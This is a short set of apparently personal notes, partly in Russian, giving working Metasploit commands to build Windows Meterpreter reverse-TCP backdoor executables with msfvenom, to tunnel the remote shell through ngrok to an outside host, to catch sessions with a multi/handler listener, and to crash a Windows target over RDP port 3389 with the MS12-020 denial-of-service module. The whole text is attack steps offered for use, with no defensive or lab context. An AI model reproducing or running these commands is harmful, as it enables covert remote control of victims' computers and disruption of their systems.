Registration on site ngrok, download it and unzip.
Set you token in absh.
1)Enter in bash: ./ngrok tcp 4444
2)Make payload: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=13286 -f exe > payload.exe
3)msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit
Make exe-backdoor: msfvenom -p windows/meterpreter/reverse_tcp lhost=IP_атакующего lport=4444 -f exe -o backdoor.exe
на атакующей машине:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.196
set LPORT 4444
run
Make exe-backdoor: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=IP_атакующего lport=4444 -f exe -o backdoor.exe
на атакующей машине:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST ip_машины_атакующего
set LPORT 4444
run
вызывает BSOD, атака через 3389 порт
search ms12-020
use auxiliary/dos/windows/rdp/ms12_020_maxchennelids
set RHOST target_ip
exploit